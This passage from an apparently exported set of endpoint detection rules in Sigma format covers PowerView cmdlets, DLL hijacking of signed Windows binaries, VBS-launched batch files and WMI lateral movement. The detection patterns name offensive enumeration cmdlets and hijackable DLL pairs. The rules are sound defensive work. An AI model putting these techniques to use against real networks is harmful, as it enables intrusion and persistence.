a target host\n - 'Get-CachedRDPConnection'\n\n # takes a user/group and maps machines they have effective rights over through GPO enumeration and correlation\n - 'Find-GPOLocation'\n # takes a computer and determines who has admin rights over it through GPO enumeration\n - 'Find-GPOComputerAdmin'\n\n # finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines\n - 'Invoke-UserHunter'\n # finds all file servers utilized in user HomeDirectories, and checks the sessions on each file server, hunting for particular users\n - 'Invoke-StealthUserHunter'\n # hunts for processes with a specific name or owned by a specific user on domain machines\n - 'Invoke-ProcessHunter'\n # hunts for user logon events in domain controller event logs\n - 'Invoke-UserEventHunter'\n\n # enumerates users who are in groups outside of their principal domain\n - 'Find-ForeignUser'\n # enumerates all the members of a domain's groups and finds users that are outside of the queried domain\n - 'Find-ForeignGroup'\n # tries to build a relational mapping of all domain trusts\n - 'Invoke-MapDomainTrust'\n\n # finds (non-standard) shares on hosts in the local domain\n - 'Invoke-ShareFinder'\n # finds potentially sensitive files on hosts in the local domain\n - 'Invoke-FileFinder'\n # finds machines on the domain that the current user has local admin access to\n - 'Find-LocalAdminAccess'\n # finds systems likely vulnerable to common exploits\n - 'Get-ExploitableSystem'\n # enumerates members of the local Administrators groups across all machines in the domain\n - 'Invoke-EnumerateLocalAdmin'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "60c69b67-1825-42a8-bfa3-cfe816b7923a",
"rule_name": "Malicious PowerShell PowerView Commandlets",
"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the PowerSploit framework.\nPowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\nThese specific commandlets are part of the PowerView module of PowerSploit, which is a series of functions that perform network and Windows domain enumeration and exploitation.\nIt is recommended to analyze actions taken by the PowerShell host process as well as to look for other suspicious activities on the host.\n",
"rule_creation_date": "2022-07-21",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6119d31f-e510-43d1-9d78-fb427e5e1e65",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095970Z",
"creation_date": "2026-03-23T11:45:34.095971Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095976Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_upfc.yml",
"content": "title: DLL Hijacking via upfc.exe\nid: 6119d31f-e510-43d1-9d78-fb427e5e1e65\ndescription: |\n Detects potential Windows DLL Hijacking via upfc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'upfc.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith: '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6119d31f-e510-43d1-9d78-fb427e5e1e65",
"rule_name": "DLL Hijacking via upfc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via upfc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61392ba5-1afb-4268-9fd4-f2a5387dbecd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602744Z",
"creation_date": "2026-03-23T11:45:34.602748Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602755Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dxgiadaptercache.yml",
"content": "title: DLL Hijacking via dxgiadaptercache.exe\nid: 61392ba5-1afb-4268-9fd4-f2a5387dbecd\ndescription: |\n Detects potential Windows DLL Hijacking via dxgiadaptercache.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dxgiadaptercache.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d11.dll'\n - '\\d3d12.dll'\n - '\\dxgi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61392ba5-1afb-4268-9fd4-f2a5387dbecd",
"rule_name": "DLL Hijacking via dxgiadaptercache.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dxgiadaptercache.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "613c9778-02e2-4a21-b3ee-cbad7550f413",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622432Z",
"creation_date": "2026-03-23T11:45:34.622434Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622438Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://stmxcsr.com/persistence/looking-at-the-startup-directory.html",
"https://twitter.com/1ZRR4H/status/1575364101148114944",
"https://twitter.com/AnFam17/status/1658666291308163072",
"https://www.netskope.com/fr/blog/asyncrat-using-fully-undetected-downloader",
"https://blog.talosintelligence.com/asyncrat-3losh-update/",
"https://attack.mitre.org/techniques/T1059/005/",
"https://attack.mitre.org/techniques/T1547/"
],
"name": "t1059_005_susp_vbs_to_bat_tree.yml",
"content": "title: Suspicious Execution of Batch or Command File by VBS Script\nid: 613c9778-02e2-4a21-b3ee-cbad7550f413\ndescription: |\n Detects a suspicious execution of a Batch or Command file from a VBS script.\n This execution tree is often exploited by attackers as a way to evade defenses and load malware.\n Due to nature of these scripts, we have excluded some common paths where these scripts may be placed.\n If you wish to investigate persistence in your network through this method in paths that aren't covered by this rule, you may investigate the scripts present in the paths excluded.\n It is recommended to create a job to download the different scripts associated with this process tree, and investigate them for malicious content.\n It is also recommended to create whitelists for this rule, as these scripts may also be used by system administrators to automate certain tasks and cause false positives.\n An investigative guide is also present in the first link of references.\nreferences:\n - https://stmxcsr.com/persistence/looking-at-the-startup-directory.html\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://twitter.com/AnFam17/status/1658666291308163072\n - https://www.netskope.com/fr/blog/asyncrat-using-fully-undetected-downloader\n - https://blog.talosintelligence.com/asyncrat-3losh-update/\n - https://attack.mitre.org/techniques/T1059/005/\n - https://attack.mitre.org/techniques/T1547/\ndate: 2023/05/17\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.005\n - attack.persistence\n - attack.t1547\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.VBScript\n - classification.Windows.LOLBin.WScript\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_context:\n ParentImage|endswith: '\\WScript.exe'\n Image|endswith: '\\cmd.exe'\n CommandLine|contains:\n - '.bat'\n - '.cmd'\n 
CurrentDirectory:\n - '?:\\windows\\\\*'\n - '?:\\ProgramData\\\\*'\n - '?:\\PerfLogs\\\\*'\n - '?:\\temp\\\\*'\n - '?:\\users\\\\*'\n - '?:\\\\?Recycle.Bin\\\\*'\n - '?:\\'\n\n filter_cmd:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\'\n - '?:\\WINDOWS\\SysWOW64\\cmd.exe /c ?:\\'\n\n selection_cmd:\n CommandLine|contains:\n - '\\cmd.exe /c ?:\\windows\\'\n - '\\cmd.exe /c ?:\\ProgramData\\'\n - '\\cmd.exe /c ?:\\PerfLogs\\'\n - '\\cmd.exe /c ?:\\temp\\'\n - '\\cmd.exe /c ?:\\users\\'\n - '\\cmd.exe /c ?:\\\\?Recycle.Bin\\'\n\n # Group or network policies, example:\n # Parent: WScript.exe \\\\networkexample.local\\SysVol\\networkexample\\Policies\\[...]\n # Child: cmd.exe /c \\\\networkexample.local\\netlogon\\cert\\printer.bat\n\n # Netlogon is a Windows Server procedure allowing users\n # and other domain services to authenticate.\n # Scripts are commonly placed here to execute tasks upon user logins.\n exclusion_policies:\n ParentCommandLine|contains:\n - '\\\\\\\\*\\SysVol\\\\*\\Logon\\\\*.vbs'\n - '\\\\\\\\*\\SysVol\\\\*\\Policies\\\\*.vbs'\n - '\\\\\\\\*\\netlogon\\\\*.vbs'\n CommandLine|contains:\n - '\\\\\\\\*\\SysVol\\\\*\\Logon\\\\*.vbs'\n - '\\\\\\\\*\\SysVol\\\\*\\Scripts\\\\*.cmd'\n - '\\\\\\\\*\\SysVol\\\\*\\Scripts\\\\*.bat'\n - '\\\\\\\\*\\SysVol\\\\*\\Policies\\\\*.cmd'\n - '\\\\\\\\*\\SysVol\\\\*\\Policies\\\\*.bat'\n - '\\\\\\\\*\\netlogon\\\\*.cmd'\n - '\\\\\\\\*\\netlogon\\\\*.bat'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n # Tasks used by Intel QUEENCREEK/WILLAMETTE for installing drivers.\n exclusion_intel_queencreek:\n ParentCommandLine|endswith:\n - '\\Intel\\SUR\\QUEENCREEK\\x64\\task.vbs'\n - '\\Intel\\SUR\\WILLAMETTE\\ESRV\\task.vbs'\n CommandLine|endswith:\n - '\\Intel\\SUR\\QUEENCREEK\\x64\\task.bat'\n - '\\Intel\\SUR\\WILLAMETTE\\ESRV\\task.bat'\n\n exclusion_adaudit_plus:\n ParentCommandLine|contains: 
'\\ManageEngine\\ADAudit Plus\\bin\\AlertMe.vbs'\n CommandLine|contains: '\\ManageEngine\\ADAudit Plus\\bin\\servicemonitor.bat '\n\n exclusion_fiducial:\n ParentCommandLine|contains: '\\AppData\\Roaming\\FIDUCIAL\\compta\\tmp\\Backup*.vbs'\n CommandLine|contains: '\\AppData\\Roaming\\FIDUCIAL\\compta\\tmp\\Backup*.bat'\n\n exclusion_cisco_asdm:\n ParentCommandLine|endswith: 'invisible.vbs run.bat'\n CommandLine|endswith: '\\Cisco Systems\\ASDM\\run.bat'\n\n exclusion_glims:\n ParentCommandLine|endswith:\n - 'glims8\\lbin\\test_backup.vbs'\n - 'glims8\\lbin\\new_purge_ai.vbs'\n CommandLine|endswith:\n - '\\bin\\proutil.bat genrw -C describe | findstr /C:Last Full Backup'\n - '\\bin\\proutil.bat glims -C describe | findstr /C:Last Full Backup'\n\n exclusion_serpro_gov_br:\n ParentCommandLine|endswith: 'Assinador Serpro\\exec_assinador.vbs'\n CommandLine|endswith: 'signerDesktopAgent.bat'\n\n exclusion_usb_burning:\n ParentCommandLine|contains: '\\OEgetPriv_usb_burning_tool.vbs'\n CommandLine|endswith: '\\usb_burning_tool.bat'\n\n exclusion_affymetrix:\n - ParentCommandLine|contains: '\\Program Files\\Affymetrix\\ChAS\\ChAS.vbs'\n - CommandLine|contains: '\\Program Files\\Affymetrix\\ChAS\\ChAS.bat'\n\n exclusion_nicesoft:\n ParentCommandLine|contains|all:\n - 'Nicesoft\\invisible.vbs'\n - 'launch_CRC55v2.bat'\n CommandLine|endswith: '\\Nicesoft\\launch_CRC55v2.bat'\n\n exclusion_y_soft:\n ParentCommandLine|contains: '\\Y Soft\\SafeQ Client\\hide.js'\n CommandLine|contains: '\\Y Soft\\SafeQ Client\\after_installation.bat'\n\n exclusion_eton_pro:\n ParentCommandLine|contains|all:\n - '\\eTonPro\\invisible.vbs'\n - '\\eTonPro\\agent.bat'\n CommandLine|endswith: '\\eTonPro\\agent.bat'\n\n exclusion_yaw_cam:\n ParentCommandLine|endswith: 'start.vbs start.bat'\n CommandLine|endswith:\n - '\\Yawcam\\start.bat'\n - '\\Yawcam\\start_java_test.bat'\n\n exclusion_zenidoc:\n ParentCommandLine|endswith: '\\zenidoc\\getusersbgn.vbs'\n CommandLine|endswith: 
'\\Zenidoc\\SQLInputAD.bat'\n\n exclusion_citrix:\n ParentCommandLine|contains: '\\Yansys\\SYSEO Wrapper\\SYSEO_Citrix_Hide_Window.vbs'\n CommandLine|contains: '\\Yansys\\SYSEO Wrapper\\SYSEO_Citrix_Loop.cmd'\n\n exclusion_remote:\n ParentCommandLine: '?:\\Windows\\System32\\WScript.exe \\\\\\\\*'\n\n exclusion_schedule:\n - ParentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - GrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_ccm:\n - CommandLine|startswith: '?:\\WINDOWS\\System32\\cmd.exe /c ?:\\Windows\\ccmcache\\'\n - CurrentDirectory|startswith: '?:\\WINDOWS\\ccmcache\\'\n - ProcessAncestors|contains: '?:\\Windows\\ccmcache\\'\n\n exclusion_desktop:\n CommandLine|startswith: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Users\\\\*\\Desktop\\\\*'\n\n condition: selection_context and (not filter_cmd or selection_cmd) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "613c9778-02e2-4a21-b3ee-cbad7550f413",
"rule_name": "Suspicious Execution of Batch or Command File by VBS Script",
"rule_description": "Detects a suspicious execution of a Batch or Command file from a VBS script.\nThis execution tree is often exploited by attackers as a way to evade defenses and load malware.\nDue to the nature of these scripts, we have excluded some common paths where these scripts may be placed.\nIf you wish to investigate persistence in your network through this method in paths that aren't covered by this rule, you may investigate the scripts present in the paths excluded.\nIt is recommended to create a job to download the different scripts associated with this process tree, and investigate them for malicious content.\nIt is also recommended to create whitelists for this rule, as these scripts may also be used by system administrators to automate certain tasks and cause false positives.\nAn investigative guide is also present in the first link of references.\n",
"rule_creation_date": "2023-05-17",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.005",
"attack.t1547"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61760ce9-0e79-4360-81e4-a0c50dab9c8c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619715Z",
"creation_date": "2026-03-23T11:45:34.619717Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619721Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1047/"
],
"name": "t1047_wmi_process_execution.yml",
"content": "title: Possible Lateral Movement via WMI\nid: 61760ce9-0e79-4360-81e4-a0c50dab9c8c\ndescription: |\n Detects processes spawned by the Windows Management Instrumentation (WMI) service, specifically when the parent process is \"wmiprvse.exe\".\n WMI is a legitimate management tool used for system administration, but attackers may abuse this mechanism for lateral movement, persistence, or to execute malicious commands. This rule focuses on detecting potentially malicious use by monitoring the spawned processes.\n It is recommended to review the actions of the child processes to identify any suspicious activities and to verify if the processes align with legitimate management tasks.\nreferences:\n - https://attack.mitre.org/techniques/T1047/\ndate: 2020/09/28\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.lateral_movement\n - attack.t1047\n - attack.t1059.001\n - attack.t1059.005\n - attack.t1059.007\n - attack.persistence\n - attack.t1546.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\wmiprvse.exe'\n\n # This is handled by the rule c110eda5-b1c7-4bb4-9a9d-8a48bcc98222\n filter_impacket:\n ProcessImage: '*\\cmd.exe'\n CommandLine|re: '.* [/-]Q [/-]c .*'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n\n exclusion_image:\n Image:\n - '?:\\Windows\\winsxs\\\\*'\n - '?:\\WINDOWS\\system32\\msiexec.exe'\n - '?:\\Windows\\System32\\gpupdate.exe'\n - '?:\\WINDOWS\\system32\\WerFault.exe'\n - '?:\\WINDOWS\\syswow64\\WerFault.exe'\n - '?:\\windows\\system32\\shutdown.exe'\n - '?:\\windows\\system32\\wusa.exe'\n - '?:\\Windows\\System32\\wdsutil.exe'\n - '?:\\Windows\\System32\\Robocopy.exe'\n - '?:\\windows\\system32\\spool\\drivers\\x64\\3\\kdsinst.exe' # Kyocera\n - 
'?:\\windows\\system32\\inetsrv\\appcmd.exe'\n - '?:\\Windows\\System32\\wbem\\mofcomp.exe'\n - '?:\\Windows\\SysWOW64\\wbem\\mofcomp.exe'\n - '?:\\Windows\\System32\\changepk.exe'\n - '?:\\Windows Kits\\10\\Assessment and Deployment Kit\\Deployment Tools\\amd64\\DISM\\\\*'\n - '?:\\Windows\\System32\\powercfg.exe'\n - '?:\\Windows\\SysWOW64\\powercfg.exe'\n - '?:\\Windows\\System32\\Dism.exe'\n - '?:\\Windows\\System32\\Dism\\DismHost.exe'\n\n exclusion_ccm:\n - CommandLine|contains:\n - '?:\\WINDOWS\\CCM\\'\n - '?:\\WINDOWS\\ccmcache\\'\n - '?:\\CCM\\cache\\'\n - '?:\\Program Files\\SMS_CCM\\SystemTemp\\'\n - '?:\\SMS_CCM\\SystemTemp\\'\n - '?:\\SMS_CCM\\SignedScripts\\'\n - ' ?:\\SMS_CCM\\'\n - '?:\\SCCM\\SystemTemp\\'\n - '\\\\\\\\*\\\\*$\\SCCM\\'\n - Image|contains:\n - '\\windows\\CCM\\'\n - '\\windows\\ccmcache\\'\n - CurrentDirectory:\n - '?:\\WINDOWS\\CCM'\n - '?:\\WINDOWS\\ccmcache'\n - '?:\\WINDOWS\\CCM\\'\n - '?:\\WINDOWS\\ccmcache\\'\n - '?:\\WINDOWS\\CCM\\\\*'\n - '?:\\WINDOWS\\ccmcache\\\\*'\n - '?:\\CCM\\cache\\'\n - '?:\\temp\\ccmcache\\\\*'\n\n exclusion_officeaddin:\n CommandLine: 'regsvr32 /s /n /i:OnPrinterAccess ?:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\UDCOfficeAddin200?.dll'\n\n exclusion_dismhost:\n # C:\\Windows\\TEMP\\C4460A5F-41D2-4AF8-93ED-C798D5EA5DCF\\dismhost.exe {8B671A1D-057F-4726-8F92-F96A85B0B3D1}\n # C:\\TEMP\\D151D5A1-C293-4EA4-BCA9-3560C4E7255F\\dismhost.exe {65F42C8B-5DC0-4024-AFEC-01F734190E5F}\n # C:\\Temps\\5B2118D0-183C-4838-8331-87EEE4AC4FA5\\DismHost.exe\n Image:\n - '?:\\windows\\temp\\\\????????-????-????-????-????????????\\dismhost.exe'\n - '?:\\temp\\\\????????-????-????-????-????????????\\dismhost.exe'\n - '?:\\temps\\\\????????-????-????-????-????????????\\dismhost.exe'\n\n exclusion_wmiprvse:\n CommandLine:\n - '?:\\windows\\system32\\wbem\\wmiprvse.exe -embedding'\n - '?:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding'\n - '?:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -Embedding'\n - 
'?:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding'\n\n exclusion_konica_minolta:\n # commandline :\n # /a \"c:\\windows\\system32\\spool\\drivers\\w32x86\\3\\kob__j_2.7z\" /o \"c:\\programdata\\konica minolta\\kmupdcache\\x86_280\\pcl\\\" /m \"com-pcl-bf03\" /i \"model.ini\" /d \"c:\\programdata\\konica minolta\\kmupdcache\\x86_280\\pcl\\kob__j_3\\7zdll\\x86\\7z.dll\"\n # /a C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\KOB__A_2.cab /o C:\\Users\\xxxx\\AppData\\Roaming\\KONICA MINOLTA\\UniversalDriver\\x64\\models\" /m com-ps /i model.ini\n # image:\n # ?:\\windows\\system32\\spool\\drivers\\w32x86\\3\\kob__j_3.exe\n # ?:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOB__A_3.EXE\n Image: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KOB__?_3.EXE'\n CommandLine|contains:\n - '\\programdata\\konica minolta\\kmupdcache'\n - '\\AppData\\Roaming\\KONICA MINOLTA\\'\n - '\\kmupdcache'\n\n exclusion_wimserv:\n Image: '?:\\Windows\\System32\\wimserv.exe'\n CommandLine: 'wimserv.exe ????????-????-????-????-????????????'\n\n exclusion_iis_or_exchange_update:\n # 2022/10/02 : seen a lot after ProxyNotShell vuln was released, probably related to patching / workaround of the vuln\n # C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\inetsrv\\appcmd.exe set config Default Web Site/TOKENAUTH_SMS_DP_SMSSIG$ /section:directoryBrowse /enabled:true /commit:apphost\n # C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\inetsrv\\appcmd.exe set config Default Web Site/TOKENAUTH_SMS_DP_SMSSIG$ -section:system.webServer/staticContent /+[fileExtension = '.*', mimeType = 'DP_ALL_FILETYPES'] /commit:apphost\n # C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\inetsrv\\appcmd.exe ADD App /site.name:Default Web Site /path:/TOKENAUTH_SMS_DP_SMSSIG$ /physicalPath:F:\\SMSSIG$ /app.name:TOKENAUTH_SMS_DP_SMSSIG$\n # C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\inetsrv\\appcmd.exe delete app /app.name:Default Web 
Site/NOCERT_CCMTOKENAUTH_SMS_DP_SMSSIG$\n # C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\inetsrv\\appcmd.exe set config -section:system.webServer/security/applicationDependencies /+[name = 'SMS Distribution Point', groupId = 'SMS_DP'] /commit:apphost\n # C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\inetsrv\\appcmd.exe set app /app.name:Default Web Site/CCMTOKENAUTH_SMS_DP_SMSSIG$ /applicationPool:SMS Distribution Points Pool /commit:apphost\n CommandLine|startswith: '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\system32\\inetsrv\\appcmd.exe'\n\n exclusion_restarthealthservice_js:\n # https://systemcenter.wiki/?GetElement=Microsoft.SystemCenter.AgentManagement.RestartHealthServiceAction&Type=WriteActionModuleType&ManagementPack=Microsoft.SystemCenter.2007&Version=6.1.7695.0\n # c:\\windows\\system32\\cmd.exe /c cscript.exe c:\\windows\\temp\\restarthealthservice.js 1 60\n # c:\\windows\\system32\\cmd.exe /c cscript.exe c:\\temp\\restarthealthservice.js 1 60\n Image: '?:\\windows\\system32\\cmd.exe'\n CommandLine|contains|all:\n - 'cscript.exe '\n - '\\temp\\restarthealthservice.js '\n\n exclusion_restarthealthservice_ps1:\n # powershell.exe -ExecutionPolicy Unrestricted C:\\Windows\\TEMP\\RestartHealthService.ps1 1 60\n Image: 